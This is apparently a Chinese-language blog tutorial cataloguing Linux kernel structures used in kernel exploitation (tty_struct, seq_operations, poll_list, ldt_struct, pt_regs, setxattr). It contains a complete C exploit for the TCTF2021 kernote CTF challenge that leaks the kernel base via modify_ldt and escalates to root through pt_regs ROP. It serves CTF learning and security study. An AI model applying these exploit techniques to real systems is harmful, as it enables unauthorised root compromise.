linux kernel pwn 常用结构体

sky123

tty 设备结构体

tty 设备在 /dev 下的一个伪终端设备 ptmx

tty_struct(kmalloc-1k | GFP_KERNEL_ACCOUNT)

tty_struct 定义如下 。

1
2
3
4
5
6
7
8
9
/* tty magic number */
#define TTY_MAGIC 0x5401

struct tty_struct {
int magic;
...
const struct tty_operations *ops;
...
}

分配/释放

alloc_tty_struct 函数中进行 tty_struct 的分配。

1
2
3
4
5
6
7
struct tty_struct *alloc_tty_struct(struct tty_driver *driver, int idx)
{
struct tty_struct *tty;

tty = kzalloc(sizeof(*tty), GFP_KERNEL_ACCOUNT);
if (!tty)
return NULL;

通常情况下我们选择打开 /dev/ptmx 来在内核中分配一个 tty_struct 结构体,相应地当我们将其关闭时该结构体便会被释放回 slab/slub 中。

魔数

tty_struct 的魔数为 0x5401,位于该结构体的开头,我们可以利用对该魔数的搜索以锁定该结构体

tty_operations

内核中 tty 设备的 ops 函数表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
unsigned int (*write_room)(struct tty_struct *tty);
unsigned int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
int (*get_serial)(struct tty_struct *tty, struct serial_struct *p);
int (*set_serial)(struct tty_struct *tty, struct serial_struct *p);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;

数据泄露

tty_operations 在内核中的数据段,通过 uaf + tty 堆喷泄露 tty_struct 中的 ops 指针即可泄露内核基址。

劫持内核执行流

与 glibc 中的 vtable 攻击类似,通过劫持 tty_struct 中的 ops 指针到伪造的 tty_operations 。劫持控制流时,通常第一个参数为 tty_struct 结构体地址,即 rdi 指向 tty_struct 结构体,可以通过 gadget 将栈迁移至 tty_struct 结构体。

1
2
3
4
5
.text:FFFFFFFF81238D50 push    rdi
.text:FFFFFFFF81238D51 pop rsp
.text:FFFFFFFF81238D52 pop rbp
.text:FFFFFFFF81238D53 add rax, rdx
.text:FFFFFFFF81238D56 retn

或者利用 work_for_cpu 函数完成函数调用传参和保存返回值。

1
2
3
void __fastcall work_for_cpu_fn(size_t *args) {
args[6] = ((__int64 (__fastcall *)(size_t))args[4])(args[5]);
}

tty_file_private (kmalloc-32 | GFP_KERNEL)

1
2
3
4
5
struct tty_file_private {
struct tty_struct *tty;
struct file *file;
struct list_head list;
};

分配/释放

打开 /dev/ptmx 时会分配 tty_file_private 并且该结构体的 tty 指针会指向 tty_struct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
int tty_alloc_file(struct file *file)
{
struct tty_file_private *priv;

priv = kmalloc(sizeof(*priv), GFP_KERNEL);
if (!priv)
return -ENOMEM;

file->private_data = priv;

return 0;
}

/* Associate a new file with the tty structure */
void tty_add_file(struct tty_struct *tty, struct file *file)
{
struct tty_file_private *priv = file->private_data;

priv->tty = tty;
priv->file = file;

spin_lock(&tty->files_lock);
list_add(&priv->list, &tty->tty_files);
spin_unlock(&tty->files_lock);
}


static int ptmx_open(struct inode *inode, struct file *filp)
{
struct tty_struct *tty;
...
retval = tty_alloc_file(filp);
...
tty = tty_init_dev(ptm_driver, index);
...
tty_add_file(tty, filp);
...
}

相应的,当关闭打开的 /dev/ptmx 时会释放相应结构。

数据泄露

读取 tty_file_private 可以泄露对应的 tty_struct 地址,也就是一个 kmalloc-1k 的 object 的地址,之后我们可以通过释放 tty_struct + pipe_buffer 堆喷 + poll_list 任意地址释放 + user_key_payload 劫持修改的方式劫持控制流提权。

seq_file 相关

序列文件接口(Sequence File Interface)是针对 procfs 默认操作函数每次只能读取一页数据从而难以处理较大 proc 文件的情况下出现的,其为内核编程提供了更为友好的接口。

seq_file

为了简化操作,在内核 seq_file 系列接口中为 file 结构体提供了 private data 成员 seq_file 结构体,该结构体定义于 /include/linux/seq_file.h 当中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

seq_fileseq_open 时被分配,但是由于从单独的 seq_file_cache 中分配,因此很难利用。

1
2
3
4
5
6
7
8
9
void __init seq_file_init(void)
{
seq_file_cache = KMEM_CACHE(seq_file, SLAB_ACCOUNT|SLAB_PANIC);
}

int seq_open(struct file *file, const struct seq_operations *op)
{
...
p = kmem_cache_zalloc(seq_file_cache, GFP_KERNEL);

seq_operations(kmalloc-32 | GFP_KERNEL_ACCOUNT)

该结构体定义于 /include/linux/seq_file.h 当中,只定义了四个函数指针,如下:

1
2
3
4
5
6
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

分配/释放

seq_operations 分配过程存在如下调用链:

1
2
3
stat_open()        <--- stat_proc_ops.proc_open
single_open_size()
single_open()

其中 single_open 函数定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int single_open(struct file *file, int (*show)(struct seq_file *, void *),
void *data)
{
struct seq_operations *op = kmalloc(sizeof(*op), GFP_KERNEL_ACCOUNT);
int res = -ENOMEM;

if (op) {
op->start = single_start;
op->next = single_next;
op->stop = single_stop;
op->show = show;
res = seq_open(file, op);
if (!res)
((struct seq_file *)file->private_data)->private = data;
else
kfree(op);
}
return res;
}
EXPORT_SYMBOL(single_open);

注意到 stat_open() 为 procfs 中的 stat 文件对应的 proc_ops 函数表中 open 函数对应的默认函数指针,在内核源码 fs/proc/stat.c 中有如下定义:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static const struct proc_ops stat_proc_ops = {
.proc_flags = PROC_ENTRY_PERMANENT,
.proc_open = stat_open,
.proc_read_iter = seq_read_iter,
.proc_lseek = seq_lseek,
.proc_release = single_release,
};

static int __init proc_stat_init(void)
{
proc_create("stat", 0, NULL, &stat_proc_ops);
return 0;
}
fs_initcall(proc_stat_init);

即该文件对应的是 /proc/id/stat 文件,那么只要我们打开 proc/self/stat 文件便能分配到新的 seq_operations 结构体。

对应地,在定义于 fs/seq_file.c 中的 single_release()stat 文件的 proc_ops 的默认 release 指针,其会释放掉对应的 seq_operations 结构体,故我们只需要关闭文件即可释放该结构体。

数据泄露

通过泄露 seq_operations 结构体的内容可以泄露内核基址。

劫持内核执行流

当我们 read 一个 stat 文件时,内核会调用其 proc_opsproc_read_iter 指针,其默认值为 seq_read_iter() 函数,定义于 fs/seq_file.c 中,注意到有如下逻辑:

1
2
3
4
5
6
ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
struct seq_file *m = iocb->ki_filp->private_data;
//...
p = m->op->start(m, &m->index);
//...

即其会调用 seq_operations 中的 start 函数指针,那么我们只需要控制 seq_operations->start 后再读取对应 stat 文件便能控制内核执行流

由于劫持控制流后参数不容易控制,因此这个方法通常只在早期版本的内核中栈迁移到 pt_regs 上利用。

poll 系统调用

poll_list (kmalloc-(32-4k) | GFP_KERNEL)

poll_list 对象是在调用 poll() 时分配,该调用可以监视 1 个或多个文件描述符的活动。

1
2
3
4
5
6
7
8
9
10
11
struct pollfd {
int fd;
short events;
short revents;
};

struct poll_list {
struct poll_list *next;
int len;
struct pollfd entries[0];
};

poll_list 结构如下图所示,前 30 个 poll_fd 在栈上,后面的都在堆上,最多 510 个 poll_fd 在一个堆上的 poll_list 上,堆上的 poll_list 最大为 0x1000 。

分配/释放

do_sys_poll 函数完成 poll_list 的分配和释放。

poll_list 的是超时自动释放的,我们可以指定 poll_list 的释放时间。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#define POLL_STACK_ALLOC	256
#define PAGE_SIZE 4096

#define POLLFD_PER_PAGE ((PAGE_SIZE-sizeof(struct poll_list)) / sizeof(struct pollfd)) //(4096-16)/8 = 510(堆上存放pollfd最大数量)

#define N_STACK_PPS ((sizeof(stack_pps) - sizeof(struct poll_list)) / \ //(256-16)/8 = 30 (栈上存放pollfd最大数量)
sizeof(struct pollfd))

[...]

static int do_sys_poll(struct pollfd __user *ufds, unsigned int nfds,
struct timespec64 *end_time)
{

struct poll_wqueues table;
int err = -EFAULT, fdcount, len;
/* Allocate small arguments on the stack to save memory and be
faster - use long to make sure the buffer is aligned properly
on 64 bit archs to avoid unaligned access */
long stack_pps[POLL_STACK_ALLOC/sizeof(long)]; // [1] stack_pps 256 字节的栈缓冲区, 负责存储前 30 个 pollfd entry
struct poll_list *const head = (struct poll_list *)stack_pps;
struct poll_list *walk = head;
unsigned long todo = nfds;

if (nfds > rlimit(RLIMIT_NOFILE))
return -EINVAL;

len = min_t(unsigned int, nfds, N_STACK_PPS); // [2] 前30个 pollfd entry 先存放在栈上,节省内存和时间

for (;;) {
walk->next = NULL;
walk->len = len;
if (!len)
break;

if (copy_from_user(walk->entries, ufds + nfds-todo,
sizeof(struct pollfd) * walk->len))
goto out_fds;

todo -= walk->len;
if (!todo)
break;

len = min(todo, POLLFD_PER_PAGE); // [3] 如果提交超过30个 pollfd entries,就会把多出来的 pollfd 放在内核堆上。每个page 最多存 POLLFD_PER_PAGE (510) 个entry, 超过这个数,则分配新的 poll_list, 依次循环直到存下所有传入的 entry
walk = walk->next = kmalloc(struct_size(walk, entries, len),
GFP_KERNEL); // [4] 只要控制好被监控的文件描述符数量,就能控制分配size,从 kmalloc-32 到 kmalloc-4k
if (!walk) {
err = -ENOMEM;
goto out_fds;
}
}

poll_initwait(&table);
fdcount = do_poll(head, &table, end_time); // [5] 分配完 poll_list 对象后,调用 do_poll() 来监控这些文件描述符,直到发生特定 event 或者超时。这里 end_time 就是最初传给 poll() 的超时变量, 这表示 poll_list 对象可以在内存中保存任意时长,超时后自动释放。
poll_freewait(&table);

if (!user_write_access_begin(ufds, nfds * sizeof(*ufds))and)
goto out_fds;

for (walk = head; walk; walk = walk->next) {
struct pollfd *fds = walk->entries;
int j;

for (j = walk->len; j; fds++, ufds++, j--)
unsafe_put_user(fds->revents, &ufds->revents, Efault);
}
user_write_access_end();

err = fdcount;
out_fds:
walk = head->next;
while (walk) { // [6] 释放 poll_list: 遍历单链表, 释放每一个 poll_list, 这里可以利用
struct poll_list *pos = walk;
walk = walk->next;
kfree(pos);
}

return err;

Efault:
user_write_access_end();
err = -EFAULT;
goto out_fds;
}

任意地址释放

通过某种手段修改 poll_listnext 指针可以完成任意地址释放形成 UAF 。

img

ldt_struct 与 modify_ldt 系统调用

ldt_struct: kmalloc-16(slub)/kmalloc-32(slab)

在内核中与 LDT 相关联的结构体为 ldt_struct 。该结构体定义于内核源码 arch/x86/include/asm/mmu_context.h 中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
struct ldt_struct {
/*
* Xen requires page-aligned LDTs with special permissions. This is
* needed to prevent us from installing evil descriptors such as
* call gates. On native, we could merge the ldt_struct and LDT
* allocations, but it's not worth trying to optimize.
*/
struct desc_struct *entries;
unsigned int nr_entries;

/*
* If PTI is in use, then the entries array is not mapped while we're
* in user mode. The whole array will be aliased at the addressed
* given by ldt_slot_va(slot). We use two slots so that we can allocate
* and map, and enable a new LDT without invalidating the mapping
* of an older, still-in-use LDT.
*
* slot will be -1 if this LDT doesn't have an alias mapping.
*/
int slot;
};

modify_ldt 系统调用可以用来操纵对应进程的 ldt_struct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr ,
unsigned long , bytecount)
{
int ret = -ENOSYS;

switch (func) {
case 0:
ret = read_ldt(ptr, bytecount);
break;
case 1:
ret = write_ldt(ptr, bytecount, 1);
break;
case 2:
ret = read_default_ldt(ptr, bytecount);
break;
case 0x11:
ret = write_ldt(ptr, bytecount, 0);
break;
}
/*
* The SYSCALL_DEFINE() macros give us an 'unsigned long'
* return type, but tht ABI for sys_modify_ldt() expects
* 'int'. This cast gives us an int-sized value in %rax
* for the return code. The 'unsigned' is necessary so
* the compiler does not try to sign-extend the negative
* return codes into the high half of the register when
* taking the value from int->long.
*/
return (unsigned int)ret;
}

分配(GFP_KERNEL):modify_ldt 系统调用 - write_ldt()

write_ldt() 定义于 /arch/x86/kernel/ldt.c中,我们主要关注如下逻辑:

1
2
3
4
5
6
7
static int write_ldt(void __user *ptr, unsigned long bytecount, int oldmode)
{
//...
error = -ENOMEM;
new_ldt = alloc_ldt_struct(new_nr_entries);
//...
}

我们注意到在 write_ldt() 当中会使用 alloc_ldt_struct() 函数来为新的 ldt_struct 分配空间,随后将之应用到进程,alloc_ldt_struct() 函数定义于 arch/x86/kernel/ldt.c 中,我们主要关注如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
/* The caller must call finalize_ldt_struct on the result. LDT starts zeroed. */
static struct ldt_struct *alloc_ldt_struct(unsigned int num_entries)
{
struct ldt_struct *new_ldt;
unsigned int alloc_size;

if (num_entries > LDT_ENTRIES)
return NULL;

new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL);
//...

即我们可以通过 modify_ldt 系统调用来分配新的 ldt_struct

数据泄露:modify_ldt 系统调用 - read_ldt()

read_ldt() 定义于 /arch/x86/kernel/ldt.c中,我们主要关注如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
static int read_ldt(void __user *ptr, unsigned long bytecount)
{
//...
if (copy_to_user(ptr, mm->context.ldt->entries, entries_size)) {
retval = -EFAULT;
goto out_unlock;
}
//...
out_unlock:
up_read(&mm->context.ldt_usr_sem);
return retval;
}

在这里会直接调用 copy_to_user 向用户地址空间拷贝数据,我们不难想到的是若是能够控制 ldt->entries 便能够完成内核的任意地址读,由此泄露出内核数据 。

开启 KASLR 的情况下首先需要泄露内核基址,再考虑进行任意地址读。

这里我们要用到 copy_to_user() 的一个特性:对于非法地址,其并不会造成 kernel panic,只会返回一个非零的错误码,我们不难想到的是,我们可以多次修改 ldt->entries 并多次调用 modify_ldt()爆破内核 .text 段地址与 page_offset_base,若是成功命中,则 modify_ldt 会返回给我们一个非负值 。

但直接爆破代码段地址并非一个明智的选择,由于 Hardened usercopy 的存在,对于直接拷贝代码段上数据的行为会导致 kernel panic。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
* Validates that the given object is:
* - not bogus address
* - fully contained by stack (or stack frame, when available)
* - fully within SLAB object (or object whitelist area, when available)
* - not in kernel text
*/
void __check_object_size(const void *ptr, unsigned long n, bool to_user)
{
...
/* Check for bad heap object. */
check_heap_object(ptr, n, to_user);

/* Check for object in kernel to avoid text exposure. */
check_kernel_text_object((const unsigned long)ptr, n, to_user);
}

#ifdef CONFIG_HARDENED_USERCOPY
extern void __check_object_size(const void *ptr, unsigned long n,
bool to_user);

static __always_inline void check_object_size(const void *ptr, unsigned long n,
bool to_user)
{
if (!__builtin_constant_p(n))
__check_object_size(ptr, n, to_user);
}
#else
static inline void check_object_size(const void *ptr, unsigned long n,
bool to_user)
{ }
#endif /* CONFIG_HARDENED_USERCOPY */

static __always_inline bool
check_copy_size(const void *addr, size_t bytes, bool is_source)
{
...
check_object_size(addr, bytes, is_source);
return true;
}

static __always_inline unsigned long __must_check
copy_to_user(void __user *to, const void *from, unsigned long n)
{
if (likely(check_copy_size(from, n, true)))
n = _copy_to_user(to, from, n);
return n;
}

因此现实场景中我们很难直接爆破代码段加载基地址,但是在 page_offset_base + 0x9d000 的地方存储着 secondary_startup_64 函数的地址,因此我们可以直接将 ldt_struct->entries 设为 page_offset_base + 0x9d000 之后再通过 read_ldt() 进行读取即可泄露出内核代码段基地址。

虽然在线性映射区域可以任意地址读,但是由于 check_heap_object 的检查,当读取长度超过其中指向的 object 范围则会触发 kernel panic(前面爆破 page_offset_base 可以通过 hardened usercopy 检查是因为每次读 8 字节一定在 object 范围)。

ldt 是一个与进程全局相关的东西,因此现在让我们将目光放到与进程相关的其他方面上——观察 fork 系统调用的源码,我们可以发现如下执行链:

1
2
3
4
5
6
7
8
sys_fork()
kernel_clone()
copy_process()
copy_mm()
dup_mm()
dup_mmap()
arch_dup_mmap()
ldt_dup_context()

ldt_dup_context() 定义于 arch/x86/kernel/ldt.c 中,注意到如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
* Called on fork from arch_dup_mmap(). Just copy the current LDT state,
* the new task is not running, so nothing can be installed.
*/
int ldt_dup_context(struct mm_struct *old_mm, struct mm_struct *mm)
{
//...

memcpy(new_ldt->entries, old_mm->context.ldt->entries,
new_ldt->nr_entries * LDT_ENTRY_SIZE);

//...
}

在这里会通过 memcpy 将父进程的 ldt->entries 拷贝给子进程,是完全处在内核中的操作,因此不会触发 hardened usercopy 的检查,我们只需要在父进程中设定好搜索的地址之后再开子进程来用 read_ldt() 读取数据即可。

例题:TCTF2021-FINAL kernote

附件下载链接

  • 0x6666 功能将 object 指针保存在 note 中。

    1
    2
    3
    4
    5
    6
    7
    if ( request == 0x6666 )                    // copy ptr
    {
    v10 = -1LL;
    if ( val > 0xF )
    goto LABEL_15;
    note = buf[val];
    }
  • 0x6668 功能释放 object 同时将 buf 中存放的 object 指针清空。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    if ( request == 0x6668 )                      // delete
    {
    v10 = -1LL;
    if ( val <= 0xF )
    {
    object = buf[val];
    if ( object )
    {
    kfree(object);
    v10 = 0LL;
    buf[val] = 0LL;
    }
    }
    goto LABEL_15;
    }
  • 0x6669 功能修改 object 的前 8 字节,这里是根据 note 访问 object 因此存在 UAF 。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    if ( request == 0x6669 )                      // edit
    {
    v10 = -1LL;
    if ( note )
    {
    *note = val;
    v10 = 0LL;
    }
    goto LABEL_15;
    }

因此通过 ldt 泄露内核基址之后利用 seq_operations + pt_regs 写 rop 实现提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <sched.h>
#include <stdbool.h>

size_t init_cred = 0xffffffff8266b780;
size_t commit_creds = 0xffffffff810c9dd0;
size_t pop_rdi_ret = 0xffffffff81075c4c;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00fb0;
size_t add_rsp_0x198_ret = 0xffffffff810b3f9b;
int kernote_fd, seq_fd;

void chunk_set(int index) {
ioctl(kernote_fd, 0x6666, index);
}

void chunk_add(int index) {
ioctl(kernote_fd, 0x6667, index);
}

void chunk_delete(int index) {
ioctl(kernote_fd, 0x6668, index);
}

void chunk_edit(size_t data) {
ioctl(kernote_fd, 0x6669, data);
}

void bind_core(int core) {
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

#define SECONDARY_STARTUP_64 0xFFFFFFFF81000040
#define LDT_BUF_SIZE 0x8000

static inline void init_desc(struct user_desc *desc) {
desc->base_addr = 0xff0000;
desc->entry_number = 0x8000 / 8;
desc->limit = 0;
desc->seg_32bit = 0;
desc->contents = 0;
desc->limit_in_pages = 0;
desc->lm = 0;
desc->read_exec_only = 0;
desc->seg_not_present = 0;
desc->useable = 0;
}

size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void *),
void *cracker_args,
void *(*ldt_momdifier)(void *, size_t),
void *momdifier_args,
uint64_t burte_size) {
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000 - burte_size;
uint64_t temp;
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while (true) {
ldt_momdifier(momdifier_args, page_offset_base);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
break;
} else if (retval == 0) {
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
page_offset_base += burte_size;
}

return page_offset_base;
}

void ldt_arbitrary_read(void *(*ldt_momdifier)(void *, size_t),
void *momdifier_args, size_t addr, char *res_buf) {
static char buf[LDT_BUF_SIZE];
struct user_desc desc;
int pipe_fd[2];

/* init descriptor info */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child */
syscall(SYS_modify_ldt, 0, buf, LDT_BUF_SIZE);
write(pipe_fd[1], buf, LDT_BUF_SIZE);
exit(0);
} else {
/* parent */
wait(NULL);
read(pipe_fd[0], res_buf, LDT_BUF_SIZE);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

size_t ldt_seeking_memory(void *(*ldt_momdifier)(void *, size_t),
void *momdifier_args, uint64_t search_addr,
size_t (*mem_finder)(void *, char *), void *finder_args, bool ret_val) {
static char buf[LDT_BUF_SIZE];

while (true) {
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);
size_t res = mem_finder(finder_args, buf);
if (res != -1) {
return ret_val ? res : res + search_addr;
}

search_addr += 0x8000;
}
}


void *ldt_cracker(void *cracker_args) {
int index = *(int *) cracker_args;
chunk_add(index);
chunk_set(index);
chunk_delete(index);
}

void *ldt_momdifier(void *momdifier_args, size_t page_offset_base) {
chunk_edit(page_offset_base);
}

size_t mem_finder(void *finder_args, char *buf) {
for (int i = 0; i < LDT_BUF_SIZE; i += 8) {
size_t val = *(size_t *) (buf + i);
if (val > 0xffffffff81000000 && !((val ^ SECONDARY_STARTUP_64) & 0xFFF)) {
return val;
}
}
return -1;
}

int main() {
bind_core(0);
kernote_fd = open("/dev/kernote", O_RDWR);
if (kernote_fd < 0) {
puts("[-] Failed to open kernote.");
}

size_t page_offset_base = ldt_guessing_direct_mapping_area(ldt_cracker, (int[]) {0}, ldt_momdifier, NULL, 0x4000000);
printf("[+] page_offset_base: %p\n", page_offset_base);

size_t kernel_offset = ldt_seeking_memory(ldt_momdifier, NULL, page_offset_base, mem_finder, NULL, true) - SECONDARY_STARTUP_64;
printf("[+] kernel offset: %p\n", kernel_offset);

pop_rdi_ret += kernel_offset;
init_cred += kernel_offset;
commit_creds += kernel_offset;
add_rsp_0x198_ret += kernel_offset;
swapgs_restore_regs_and_return_to_usermode += kernel_offset + 0x8;

ldt_cracker((int[]) {1});
seq_fd = open("/proc/self/stat", O_RDONLY);
chunk_edit(add_rsp_0x198_ret);

__asm__(
"mov r15, pop_rdi_ret;"
"mov r14, init_cred;"
"mov r13, commit_creds;"
"mov r12, swapgs_restore_regs_and_return_to_usermode;"
"mov rbp, 0x5555555555555555;"
"mov rbx, 0x6666666666666666;"
"mov r11, 0x7777777777777777;"
"mov r10, 0x8888888888888888;"
"mov r9, 0x9999999999999999;"
"mov r8, 0xaaaaaaaaaaaaaaaa;"
"mov rcx, 0xbbbbbbbbbbbbbbbb;"
"xor rax, rax;"
"mov rdx, 8;"
"mov rsi, rsp;"
"mov rdi, seq_fd;"
"syscall"
);

system("/bin/sh");

return 0;
}

pt_regs 与系统调用相关

linux 系统调用的时候会把所有寄存器依次压入内核栈中形成 pt_regs 结构体,之后就继续执行内核代码。
pt_regs 结构体定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
struct pt_regs {
/*
* C ABI says these regs are callee-preserved. They aren't saved on kernel entry
* unless syscall needs a complete, fully filled "struct pt_regs".
*/
unsigned long r15;
unsigned long r14;
unsigned long r13;
unsigned long r12;
unsigned long rbp;
unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
unsigned long r11;
unsigned long r10;
unsigned long r9;
unsigned long r8;
unsigned long rax;
unsigned long rcx;
unsigned long rdx;
unsigned long rsi;
unsigned long rdi;
/*
* On syscall entry, this is syscall#. On CPU exception, this is error code.
* On hw interrupt, it's IRQ number:
*/
unsigned long orig_rax;
/* Return frame for iretq */
unsigned long rip;
unsigned long cs;
unsigned long eflags;
unsigned long rsp;
unsigned long ss;
/* top of stack page */
};

在内核栈上的结构如下:

由于系统调用前的寄存器的值是用户可控的,这就等于控制了内核栈低区域,也就可以在其中写入 ROP 。之后只需要控制程序执行流,利用一个 add rsp, val 的 gadget 将栈迁移到 布置在 pt_regs 结构体上的 ROP 上就可以完成提权操作。

内核主线在 这个 commit 中为系统调用栈添加了一个偏移值,这意味着 pt_regs 与我们触发劫持内核执行流时的栈间偏移值不再是固定值,这个保护的开启需要 CONFIG_RANDOMIZE_KSTACK_OFFSET=y (默认开启)

1
2
3
4
5
6
7
8
9
10
11
12
diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
#ifdef CONFIG_X86_64
__visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
{
+ add_random_kstack_offset();
nr = syscall_enter_from_user_mode(regs, nr);

instrumentation_begin();

setxattr 相关

setxattr 并非一个内核结构体,而是一个系统调用,但在 kernel pwn 当中这同样是一个十分有用的系统调用,利用这个系统调用,我们可以进行内核空间中任意大小的 object 的分配。

任意大小 object 分配(GFP_KERNEL)& 释放

观察 setxattr 源码,发现如下调用链:

1
2
3
SYS_setxattr()
path_setxattr()
setxattr()

其中 setattr 函数关键逻辑如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
size_t size, int flags)
{
//...
kvalue = kvmalloc(size, GFP_KERNEL);
if (!kvalue)
return -ENOMEM;
if (copy_from_user(kvalue, value, size)) {

//,..

kvfree(kvalue);

return error;
}

修改结构体

虽然 setxattr 可以分配任意大小的内核空间 object ,但是分配完之后就立即被释放了,起不到利用效果。因此这里需要配合 userfaultfd 将执行过程卡在 copy_from_user 处。

不过在 ctf 中的 kernel pwn 环境中由于受其它进程受影响较小,可以直接用 setxattr 来 UAF 修改结构体的内容。

如果有其它同样大小结构体在不会修改相关字段的前提下可以一边用 setxattr 来修改结构体一边喷射结构体占用修改过的结构体,实现堆喷的效果。

simple_xattr (GFP_KERNEL)

